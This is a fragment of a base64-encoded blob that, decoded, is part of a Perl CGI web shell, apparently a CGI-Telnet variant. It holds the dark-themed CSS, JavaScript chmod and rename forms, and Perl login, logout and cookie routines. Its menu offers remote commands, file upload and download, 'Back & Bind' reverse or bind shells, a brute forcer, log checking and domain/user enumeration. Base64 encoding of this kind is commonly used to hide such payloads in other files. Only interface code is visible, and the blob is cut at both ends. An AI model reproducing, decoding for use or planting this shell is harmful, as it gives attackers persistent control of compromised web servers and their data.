GlucHV0LHRleHRhcmVhIHsNCkJPUkRFUi1SSUdIVDogICMzZTNlM2UgMXB4IHNvbGlkOw0KQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7DQpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsNCkJPUkRFUi1CT1RUT006ICMzZTNlM2UgMXB4IHNvbGlkOw0KfQ0KI2RvbWFpbiB0cjpob3ZlcnsNCmJhY2tncm91bmQtY29sb3I6ICM0NDQ7DQp9DQp0ZCB7DQpjb2xvcjogIzJCQThFQzsNCn0NCi5saXN0ZGlyIHRkew0KCXRleHQtYWxpZ246IGNlbnRlcjsNCn0NCi5saXN0ZGlyIHRoew0KCWNvbG9yOiAjRkY5OTAwOw0KfQ0KLmRpciwuZmlsZQ0Kew0KCXRleHQtYWxpZ246IGxlZnQgIWltcG9ydGFudDsNCn0NCi5kaXJ7DQoJZm9udC1zaXplOiAxMHB0OyANCglmb250LXdlaWdodDogYm9sZDsNCn0NCnRhYmxlIHsNCkJBQ0tHUk9VTkQtQ09MT1I6ICMxMTE7DQp9DQppbnB1dCB7DQpCQUNLR1JPVU5ELUNPTE9SOiBCbGFjazsNCmNvbG9yOiAjZmY5OTAwOw0KfQ0KaW5wdXQuc3VibWl0IHsNCnRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsNCmNvbG9yOiAjRkZGRkZGOw0KYm9yZGVyLWNvbG9yOiAjMDA5OTAwOw0KfQ0KY29kZSB7DQpib3JkZXI6IGRhc2hlZCAwcHggIzMzMzsNCmNvbG9yOiB3aGlsZTsNCn0NCnJ1biB7DQpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsNCmNvbG9yOiAjRkYwMEFBOw0KfQ0KdGV4dGFyZWEgew0KQkFDS0dST1VORC1DT0xPUjogIzFiMWIxYjsNCmZvbnQ6IEZpeGVkc3lzIGJvbGQ7DQpjb2xvcjogI2FhYTsNCn0NCkE6bGluayB7DQoJQ09MT1I6ICMyQkE4RUM7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KQTp2aXNpdGVkIHsNCglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lDQp9DQpBOmhvdmVyIHsNCgl0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47DQoJY29sb3I6ICNGRkZGRkY7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KQTphY3RpdmUgew0KCWNvbG9yOiBSZWQ7IFRFWFQtREVDT1JBVElPTjogbm9uZQ0KfQ0KLmxpc3RkaXIgdHI6aG92ZXJ7DQoJYmFja2dyb3VuZDogIzQ0NDsNCn0NCi5saXN0ZGlyIHRyOmhvdmVyIHRkew0KCWJhY2tncm91bmQ6ICM0NDQ7DQoJdGV4dC1zaGFkb3c6IDBwdCAwcHQgMC4zZW0gY3lhbiwgMHB0IDBwdCAwLjNlbSBjeWFuOw0KCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7DQp9DQoubm90bGluZXsNCgliYWNrZ3JvdW5kOiAjMTExOw0KfQ0KLmxpbmV7DQoJYmFja2dyb3VuZDogIzIyMjsNCn0NCjwvc3R5bGU+DQo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4NCmZ1bmN0aW9uIEVuY29kZXIobmFtZSkNCnsNCgl2YXIgZSA9ICBkb2N1bWVudC5nZXRFbGVtZW50QnlJZChuYW1lKTsNCgllLnZhbHVlID0gYnRvYShlLnZhbHVlKTsNCglyZXR1cm4gdHJ1ZTsNCn0NCmZ1bmN0aW9uIGNobW9kX2Zvcm0oaSxmaWxlKQ0Kew0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJGaWxlUGVybXNfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1jaG1vZCB0eXBlPXRleHQgc2l6ZT01IC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJEVuY29kZUN1cnJlbnREaXInPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWYgdmFsdWU9JyIrZmlsZSsiJz48L2Zvcm0+IjsNCglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgidGV4dF8iICsgaSkuZm9jdXMoKTsNCn0NCmZ1bmN0aW9uIHJtX2NobW9kX2Zvcm0ocmVzcG9uc2UsaSxwZXJtcyxmaWxlKQ0Kew0KCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOw0KfQ0KZnVuY3Rpb24gcmVuYW1lX2Zvcm0oaSxmaWxlLGYpDQp7DQoJZi5yZXBsYWNlKC9cXFxcL2csIlxcXFxcXFxcIik7DQoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOw0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJGaWxlXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9cmVuYW1lIHR5cGU9dGV4dCB2YWx1ZT0gJyIrZmlsZSsiJyAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyB2YWx1ZT1PSz48aW5wdXQgdHlwZT1zdWJtaXQgY2xhc3M9J3N1Ym1pdCcgb25jbGljaz0nIiArIGJhY2sgKyAiJyB2YWx1ZT1DYW5jZWw+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9YSB2YWx1ZT0nZ3VpJz48aW5wdXQgdHlwZT1oaWRkZW4gbmFtZT1kIHZhbHVlPSckRW5jb2RlQ3VycmVudERpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOw0KCWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCJ0ZXh0XyIgKyBpKS5mb2N1cygpOw0KfQ0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpDQp7DQoJaWYoZj09J2YnKQ0KCXsNCgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWNvbW1hbmQmZD0kRW5jb2RlQ3VycmVudERpciZjPWVkaXQlMjAiK2ZpbGUrIiUyMCc+IiArZmlsZSsgIjwvYT4iOw0KCX1lbHNlDQoJew0KCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Z3VpJmQ9IitmKyInPlsgIiArZmlsZSsgIiBdPC9hPiI7DQoJfQ0KfQ0KPC9zY3JpcHQ+DQo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4NCjxjZW50ZXI+PGNvZGU+DQo8dGFibGUgYm9yZGVyPSIxIiB3aWR0aD0iMTAwJSIgY2VsbHNwYWNpbmc9IjAiIGNlbGxwYWRkaW5nPSIyIj4NCjx0cj4NCgk8dGQgYWxpZ249ImNlbnRlciIgcm93c3Bhbj0zPg0KCQk8Yj48Zm9udCBzaXplPSIzIj5vLS0tWyAgJEVkaXRQZXJzaW9uIF0tLS1vPC9mb250PjwvYj4NCgk8L3RkPg0KCTx0ZD4NCgkJJGluZm8NCgk8L3RkPg0KCTx0ZD5TZXJ2ZXIgSVA6PGZvbnQgY29sb3I9IiNmZjk5MDAiPiAkRU5WeydTRVJWRVJfQUREUid9PC9mb250PiB8IFlvdXIgSVA6IDxmb250IGNvbG9yPSIjZmY5OTAwIj4kRU5WeydSRU1PVEVfQUREUid9PC9mb250Pg0KCTwvdGQ+DQo8L3RyPg0KPHRyPg0KPHRkIGNvbHNwYW49IjIiPg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uIj5Ib21lPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVDdXJyZW50RGlyIj5Db21tYW5kPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlQ3VycmVudERpciI+R1VJPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZUN1cnJlbnREaXIiPlVwbG9hZCBGaWxlPC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlQ3VycmVudERpciI+RG93bmxvYWQgRmlsZTwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9YmFja2JpbmQiPkJhY2sgJiBCaW5kPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1jaGVja2xvZyI+Q2hlY2sgTG9nPC9hPiB8DQo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1kb21haW5zdXNlciI+RG9tYWlucy9Vc2VyczwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwNCjxhIHRhcmdldD0nX2JsYW5rJyBocmVmPSIjIj5IZWxwPC9hPg0KPC90ZD4NCjwvdHI+DQo8dHI+DQo8dGQgY29sc3Bhbj0iMiI+DQokaWQNCjwvdGQ+DQo8L3RyPg0KPC90YWJsZT4NCjxmb250IGlkPSJSZXNwb25zZURhdGEiIGNvbG9yPSIjRkZGRkZGIiA+DQpFTkQNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBMb2dpbiBTY3JlZW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludExvZ2luU2NyZWVuDQp7DQoJcHJpbnQgPDxFTkQ7DQo8cHJlPjxzY3JpcHQgdHlwZT0idGV4dC9qYXZhc2NyaXB0Ij4NClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7DQogIGlmKCh0eXBlb2YgZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQgPT0gInVuZGVmaW5lZCIpIHx8ICh0eXBlb2YgZWxlbWVudC5pbm5lckhUTUwgPT0gInVuZGVmaW5lZCIpKSB7DQogICAgdGhpcy5ydW5uaW5nID0gdHJ1ZTsJLy8gTmV2ZXIgcnVuLg0KICAgIHJldHVybjsNCiAgfQ0KICB0aGlzLmVsZW1lbnQgPSBlbGVtZW50Ow0KICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsNCiAgdGhpcy5pbnRlcnZhbCA9ICh0eXBlb2YgaW50ZXJ2YWwgPT0gInVuZGVmaW5lZCIgPyAxMDAgOiBpbnRlcnZhbCk7DQogIHRoaXMub3JpZ1RleHQgPSB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MOw0KICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0Ow0KICB0aGlzLmN1cnNvciA9IChjdXJzb3IgPyBjdXJzb3IgOiAiIik7DQogIHRoaXMuY3VycmVudFRleHQgPSAiIjsNCiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7DQogIHRoaXMuZWxlbWVudC50eXBpbmdUZXh0ID0gdGhpczsNCiAgaWYodGhpcy5lbGVtZW50LmlkID09ICIiKSB0aGlzLmVsZW1lbnQuaWQgPSAidHlwaW5ndGV4dCIgKyBUeXBpbmdUZXh0LmN1cnJlbnRJbmRleCsrOw0KICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOw0KICB0aGlzLnJ1bm5pbmcgPSBmYWxzZTsNCiAgdGhpcy5pblRhZyA9IGZhbHNlOw0KICB0aGlzLnRhZ0J1ZmZlciA9ICIiOw0KICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOw0KICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgPSAiIjsNCn0NClR5cGluZ1RleHQuYWxsID0gbmV3IEFycmF5KCk7DQpUeXBpbmdUZXh0LmN1cnJlbnRJbmRleCA9IDA7DQpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgew0KICBmb3IodmFyIGkgPSAwOyBpIDwgVHlwaW5nVGV4dC5hbGwubGVuZ3RoOyBpKyspIFR5cGluZ1RleHQuYWxsW2ldLnJ1bigpOw0KfQ0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7DQogIGlmKHRoaXMucnVubmluZykgcmV0dXJuOw0KICBpZih0eXBlb2YgdGhpcy5vcmlnVGV4dCA9PSAidW5kZWZpbmVkIikgew0KICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuDQogICAgcmV0dXJuOw0KICB9DQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsNCi8vICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5vcmlnVGV4dC5yZXBsYWNlKC88KFtePF0pKj4vLCAiIik7ICAgICAvLyBTdHJpcCBIVE1MIGZyb20gdGV4dC4NCiAgaWYodGhpcy5jdXJyZW50Q2hhciA8IHRoaXMub3JpZ1RleHQubGVuZ3RoKSB7DQogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciA9ICI8IjsNCiAgICAgIHRoaXMuaW5UYWcgPSB0cnVlOw0KICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgICAgdGhpcy5ydW4oKTsNCiAgICAgIHJldHVybjsNCiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsNCiAgICAgIHRoaXMudGFnQnVmZmVyICs9ICI+IjsNCiAgICAgIHRoaXMuaW5UYWcgPSBmYWxzZTsNCiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSBpZih0aGlzLmluVGFnKSB7DQogICAgICB0aGlzLnRhZ0J1ZmZlciArPSB0aGlzLm9yaWdUZXh0LmNoYXJBdCh0aGlzLmN1cnJlbnRDaGFyKTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsNCiAgICAgIHRoaXMuSFRNTEVudGl0eUJ1ZmZlciA9ICImIjsNCiAgICAgIHRoaXMuaW5IVE1MRW50aXR5ID0gdHJ1ZTsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgew0KICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9ICI7IjsNCiAgICAgIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsNCiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsNCiAgICAgIHRoaXMucnVuKCk7DQogICAgICByZXR1cm47DQogICAgfSBlbHNlIGlmKHRoaXMuaW5IVE1MRW50aXR5KSB7DQogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7DQogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7DQogICAgICB0aGlzLnJ1bigpOw0KICAgICAgcmV0dXJuOw0KICAgIH0gZWxzZSB7DQogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOw0KICAgIH0NCiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsNCiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MICs9ICh0aGlzLmN1cnJlbnRDaGFyIDwgdGhpcy5vcmlnVGV4dC5sZW5ndGggLSAxID8gKHR5cGVvZiB0aGlzLmN1cnNvciA9PSAiZnVuY3Rpb24iID8gdGhpcy5jdXJzb3IodGhpcy5jdXJyZW50VGV4dCkgOiB0aGlzLmN1cnNvcikgOiAiIik7DQogICAgdGhpcy5jdXJyZW50Q2hhcisrOw0KICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsNCiAgfSBlbHNlIHsNCgl0aGlzLmN1cnJlbnRUZXh0ID0gIiI7DQoJdGhpcy5jdXJyZW50Q2hhciA9IDA7DQogICAgICAgIHRoaXMucnVubmluZyA9IGZhbHNlOw0KICAgICAgICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2soKTsNCiAgfQ0KfQ0KPC9zY3JpcHQ+DQo8L3ByZT4NCg0KPGJyPg0KDQo8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+DQpuZXcgVHlwaW5nVGV4dChkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiaGFjayIpLCAzMCwgZnVuY3Rpb24oaSl7IHZhciBhciA9IG5ldyBBcnJheSgiXyIsIiIpOyByZXR1cm4gIiAiICsgYXJbaS5sZW5ndGggJSBhci5sZW5ndGhdOyB9KTsNClR5cGluZ1RleHQucnVuQWxsKCk7DQoNCjwvc2NyaXB0Pg0KRU5EDQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIGVuY29kZSBodG1sIHNwZWNpYWwgY2hhcnMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBVcmxFbmNvZGUoJCl7DQoJbXkgJHN0ciA9IHNoaWZ0Ow0KCSRzdHIgPX4gcy8oW15BLVphLXowLTldKS9zcHJpbnRmKCIlJSUwMlgiLCBvcmQoJDEpKS9zZWc7DQoJcmV0dXJuICRzdHI7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIEFkZCBodG1sIHNwZWNpYWwgY2hhcnMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBIdG1sU3BlY2lhbENoYXJzKCQpew0KCW15ICR0ZXh0ID0gc2hpZnQ7DQoJJHRleHQgPX4gcy8mLyZhbXA7L2c7DQoJJHRleHQgPX4gcy8iLyZxdW90Oy9nOw0KCSR0ZXh0ID1+IHMvJy8nL2c7DQoJJHRleHQgPX4gcy88LyZsdDsvZzsNCgkkdGV4dCA9fiBzLz4vJmd0Oy9nOw0KCXJldHVybiAkdGV4dDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgQWRkIGxpbmsgZm9yIGRpcmVjdG9yeQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEFkZExpbmtEaXIoJCkNCnsNCglteSAkYWM9c2hpZnQ7DQoJbXkgQGRpcj0oKTsNCglpZigkV2luTlQpDQoJew0KCQlAZGlyPXNwbGl0KC9cXC8sJEN1cnJlbnREaXIpOw0KCX1lbHNlDQoJew0KCQlAZGlyPXNwbGl0KCIvIiwmdHJpbSgkQ3VycmVudERpcikpOw0KCX0NCglteSAkcGF0aD0iIjsNCglteSAkcmVzdWx0PSIiOw0KCWZvcmVhY2ggKEBkaXIpDQoJew0KCQkkcGF0aCAuPSAkXy4kUGF0aFNlcDsNCgkJJHJlc3VsdC49IjxhIGhyZWY9Jz9hPSIuJGFjLiImZD0iLmVuY29kZV9iYXNlNjQoJHBhdGgpLiInPiIuJF8uJFBhdGhTZXAuIjwvYT4iOw0KCX0NCglyZXR1cm4gJHJlc3VsdDsNCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBtZXNzYWdlIHRoYXQgaW5mb3JtcyB0aGUgdXNlciBvZiBhIGZhaWxlZCBsb2dpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5GYWlsZWRNZXNzYWdlDQp7DQoJcHJpbnQgPDxFTkQ7DQoNClBhc3N3b3JkOjxicj4NCkxvZ2luIGluY29ycmVjdDxicj48YnI+DQpFTkQNCn0NCg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSBmb3IgbG9nZ2luZyBpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9naW5Gb3JtDQp7DQoJcHJpbnQgPDxFTkQ7DQo8Zm9ybSBuYW1lPSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQpMb2dpbiA6IEFkbWluaXN0cmF0b3I8YnI+DQpQYXNzd29yZDo8aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCkVORA0KfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIGZvb3RlciBmb3IgdGhlIEhUTUwgUGFnZQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUZvb3Rlcg0Kew0KCXByaW50ICI8YnI+PGZvbnQgY29sb3I9cmVkPm8tLS1bICA8Zm9udCBjb2xvcj0jZmY5OTAwPkVkaXQgYnkgJEVkaXRQZXJzaW9uIDwvZm9udD4gIF0tLS1vPC9mb250PjwvY29kZT48L2NlbnRlcj48L2JvZHk+PC9odG1sPiI7DQp9DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFJldHJlaXZlcyB0aGUgdmFsdWVzIG9mIGFsbCBjb29raWVzLiBUaGUgY29va2llcyBjYW4gYmUgYWNjZXNzZXMgdXNpbmcgdGhlDQojIHZhcmlhYmxlICRDb29raWVzeycnfQ0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIEdldENvb2tpZXMNCnsNCglAaHR0cGNvb2tpZXMgPSBzcGxpdCgvOyAvLCRFTlZ7J0hUVFBfQ09PS0lFJ30pOw0KCWZvcmVhY2ggJGNvb2tpZShAaHR0cGNvb2tpZXMpDQoJew0KCQkoJGlkLCAkdmFsKSA9IHNwbGl0KC89LywgJGNvb2tpZSk7DQoJCSRDb29raWVzeyRpZH0gPSAkdmFsOw0KCX0NCn0NCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBzY3JlZW4gd2hlbiB0aGUgdXNlciBsb2dzIG91dA0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50TG9nb3V0U2NyZWVuDQp7DQoJcHJpbnQgIkNvbm5lY3Rpb24gY2xvc2VkIGJ5IGZvcmVpZ24gaG9zdC48YnI+PGJyPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgTG9ncyBvdXQgdGhlIHVzZXIgYW5kIGFsbG93cyB0aGUgdXNlciB0byBsb2dpbiBhZ2Fpbg0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBlcmZvcm1Mb2dvdXQNCnsNCglwcmludCAiU2V0LUNvb2tpZTogU0FWRURQV0Q9O1xuIjsgIyByZW1vdmUgcGFzc3dvcmQgY29va2llDQoJJlByaW50UGFnZUhlYWRlcigicCIpOw0KCSZQcmludExvZ291dFNjcmVlbjsNCg0KCSZQcmludExvZ2luU2NyZWVuOw0KCSZQcmludExvZ2luRm9ybTsNCgkmUHJpbnRQYWdlRm9vdGVyOw0KCWV4aXQ7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tL